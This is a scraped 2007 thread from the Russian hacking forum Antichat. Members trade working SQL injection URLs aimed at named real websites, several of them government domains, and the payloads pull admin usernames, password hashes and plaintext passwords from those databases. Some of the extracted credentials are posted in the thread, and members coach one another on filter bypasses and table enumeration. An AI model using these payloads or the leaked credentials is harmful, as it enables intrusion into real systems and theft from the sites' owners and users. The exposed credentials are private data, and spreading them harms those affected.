Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
17.08.2007, 14:34
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520
Репутация:
572
|
|
sql
Red_Red1 Calcutta
По моему тут надо таким способом, а иначе фильтрация работает...
http://wow.crpg.ru/article.php?sid=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(versi on(),0x71),0x71),5,6,7,8,9,10,11,12/*
З.Ы. Но дальше тоже не пошло
-->
http://wow.crpg.ru/article.php?sid=11+union+select+1,2,3,4,5,concat_w s(0x3a,uname,pass),7,8,9,0,1,2+From+users/*
вывода нет
но вывод есть здесь:
http://www.rolemancer.ru/sections.php?op=listarticles&secid=-69+union+select+1,2,concat(uname,0x3a,pass),4+from +users/*
ибо crpg.ru и rolemancer.ru на одном сервере
/ps/ антибоян http://antiboyansql.narod.ru/sql.txt
------------------------------------------------------------------------
DRoT1K
http://www.nonom.cn/showmz.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
->
http://www.nonom.cn/showmz.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,username ,password),8+from+user+limit+3500,1/*
-----------------
http://www.anewpark.ca/parkupdate.php?id=-1+union+select+1,2,3,4,5/*
->
http://www.anewpark.ca/parkupdate.php?id=-1+union+select+1,2,concat_ws(0x3a,table_schema,tab le_name,column_name),4,5+from+information_schema.c olumns+where+table_name=0x61757468+limit+1,1/*
авторизация
http://www.anewpark.ca/parkupdate.php?id=-1+union+select+1,2,concat_ws(0x3a,user,pass),4,5+f rom+auth+limit+0,1/*
Последний раз редактировалось Серенький; 17.08.2007 в 14:50..
|
|
|
17.08.2007, 21:22
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
http://www.walf.sn/economique/suite.php?rub=-3+union+select+1,concat_ws(0x3a,version(), database(), user()),3,4,5/*&id_art=1
5.0.22-standard-log:new_walbase:walf_admin@localhost
http://www.walf.sn/economique/suite.php?rub=-3+union+select+1,concat_ws(0x3a,login,pass),3,4,5+ from+users/*&id_art=1
walf_admin:#walf!base
Последний раз редактировалось halkfild; 17.08.2007 в 21:24..
|
|
|
|
17.08.2007, 23:20
|
|
Banned
Регистрация: 15.07.2007
Сообщений: 39
Провел на форуме:
1122110
Репутация:
43
|
|
Код:
http://www.iltod.gov.mn/forum.php?cat=-1+union+select+1,2,USER(),4,5/*
Код:
http://www.sante.gouv.sn/actualites.php?id=1+union+select+1,2,3,4/*
Код:
http://www.muat.gouv.sn/projets.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,19/*
Код:
http://www.denv.gouv.sn/activites/details.php?id=1'+union+select+1,2,USER(),4,5,6/*
|
|
|
|
18.08.2007, 04:22
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
http://www.utcongress.nl/user/php/congress.php?id=-10+union+select+1,password,3,4,5,6,7,8,9%20from%20 user/*
Лови. Пароль (точнее хеш) показывает, а вот колонку логина не подобрал. И откуда эти пароли хз!
|
|
|
|
18.08.2007, 14:21
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от Red_Red1
http://www.utcongress.nl/user/php/congress.php?id=-10+union+select+1,password,3,4,5,6,7,8,9%20from%20 user/*
Лови. Пароль (точнее хеш) показывает, а вот колонку логина не подобрал. И откуда эти пароли хз!
по формату похоже на MySQL5 хэш
зы так оно и есь
*4ACFE3202A5FF5CF467898FC58AAB1D615029441:admin
|
|
|
|
18.08.2007, 15:14
|
|
Banned
Регистрация: 15.07.2007
Сообщений: 39
Провел на форуме:
1122110
Репутация:
43
|
|
Код:
http://www.denv.gouv.sn/activites/details.php?id=1'+union+select+1,2,login,password,5,6+from+admin/*
admin: passe |
|
|
|
18.08.2007, 20:30
|
|
Новичок
Регистрация: 11.08.2007
Сообщений: 25
Провел на форуме:
131466
Репутация:
11
|
|
Сообщение от geezer.code
по формату похоже на MySQL5 хэш
зы так оно и есь
*4ACFE3202A5FF5CF467898FC58AAB1D615029441:admin
Там все поля admin
http://www.utcongress.nl/user/php/congress.php?id=-10+union+select+1,password,lastname,4,5,6,firstnam e,userid,9%20from%20%20user/*
Я вычислил имя и фамилию (админ) + id (1) 
Последний раз редактировалось Nazaret2005; 18.08.2007 в 21:45..
|
|
|
|
18.08.2007, 22:28
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591
Репутация:
123
|
|
http://perspektiva.ural.ru/index.php?cat=52&pcat=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat([$%$#$],char(58),pass),0x17),0x17)+from+user/*
Я очень долго .... себе этим мозг, но первое поле подобрать не смог...
Может у кого получится?
З.Ы, вот ещё http://perspektiva.ural.ru/index.php?cat=52&pcat=-1+union+select+AES_DECRYPT(AES_ENCRYPT(pass,0x17), 0x17)+from+adm/*
Последний раз редактировалось Termin@L; 18.08.2007 в 23:03..
|
|
|
|
19.08.2007, 00:48
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от fobofob
Тут я ничего не могу понять
кто знает разъясните плз
код:
http://www.mtas.ru/second.php?ID=-15+union+select+1/*  тут многоуровневй запрос
Код:
http://www.mtas.ru/second.php?ID=-15+union+select+razdeli_name+from+razdeli/*
вот так работает,)) смотрим текст ошибки ) надо терь подобрать таблицу юзеров ))
Последний раз редактировалось geezer.code; 19.08.2007 в 00:53..
|
|
|
|
19.08.2007, 00:50
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120
Репутация:
2565
|
|
Сообщение от fobofob
Тут я ничего не могу понять
кто знает разъясните плз
код:
http://www.mtas.ru/second.php?ID=-15+union+select+1/* Для начала смотри АнтиБоян
=\
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.gif){kind=avatar}
Похожие темы
Линейный вид
